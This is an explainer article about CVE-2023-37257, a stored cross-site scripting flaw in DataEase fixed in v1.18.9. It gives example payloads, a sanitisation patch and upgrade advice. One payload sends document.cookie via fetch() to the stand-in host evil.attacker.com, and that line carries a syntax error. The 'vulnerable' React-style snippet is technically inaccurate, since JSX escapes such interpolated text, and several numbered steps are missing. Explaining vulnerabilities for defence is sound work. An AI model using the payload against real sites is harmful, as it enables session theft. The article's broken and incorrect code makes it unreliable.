CVE CyberSecurity Database News

CVE-2023-37257 - DataEase Stored XSS Vulnerability Explained – Code Example, Exploit, and How to Stay Safe

Poster -

Published: 2024-06-20
*Author: Security Insights Team*

What is CVE-2023-37257?

CVE-2023-37257 is a stored cross-site scripting (XSS) vulnerability found in DataEase, an open-source data visualization and analysis tool. It affects all versions of DataEase before v1.18.9. The flaw allows attackers to inject malicious scripts into dashboards or datasets. When legitimate users load these resources, their browsers may execute harmful JavaScript. The issue was patched in version 1.18.9.

Why Is This Vulnerability Dangerous?

- Stored XSS means injected attacks persist on the server, impacting everyone who loads the affected content.

How Does It Work?

The vulnerability exists because DataEase does not properly sanitize user input when creating or updating a dataset or dashboard panel name/description. Malicious JavaScript embedded in the input gets saved and loaded on subsequent page views.

Suppose a user creates a new Panel and sets the title to

<script>alert('Hacked!')</script>

An attacker with access to a DataEase instance inserts the payload above.

2. Later, any admin or user who loads the dashboard or dataset will see a popup showing "Hacked!"—that script could also do much worse, like stealing credentials.

Let's see how this might happen in practice (example Jinja/React-like pseudo-code)

// In a vulnerable DataEase component
function Panel(props) {
    return <div>
        <h2>{props.panelTitle}</h2>   // 🚨 UNSAFE: No sanitization
        <div className="panel-data">{props.content}</div>
    </div>
}

If panelTitle was set to "<script>alert('Hacked!')</script>", the browser would execute the script.

Attacker logs in (or abuses a vulnerable endpoint via API).

2. Submits malicious JS payload as the name for a new Dataset/Panel.

Example Attack Payload

<script>
  fetch('https://evil.attacker.com/steal?cookie='; + document.cookie);
</script>

How Was It Fixed?

The developers patched the issue in v1.18.9 by sanitizing user-provided input:

Sample Patch Logic

import sanitizeHtml from 'sanitize-html';

// When saving input
panelTitle = sanitizeHtml(userInput.panelTitle, {allowedTags: [], allowedAttributes: {}});

// Render as plain text

Update to v1.18.9+ as soon as possible:

DataEase Releases

2. Audit Existing Data

- Check existing panels/datasets for strange code or suspicious names.

4. Limit Access

- Make sure only trusted users can create or edit datasets/panels.

References

- CVE-2023-37257 at NVD
- DataEase GitHub
- Patch Release Notes v1.18.9

Conclusion

CVE-2023-37257 is a critical reminder to always validate and escape user input, especially in collaborative, data-focused applications like DataEase. If you use DataEase, upgrade right away to protect your team and data from stored XSS attacks.

Timeline

Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 20:18:00 UTC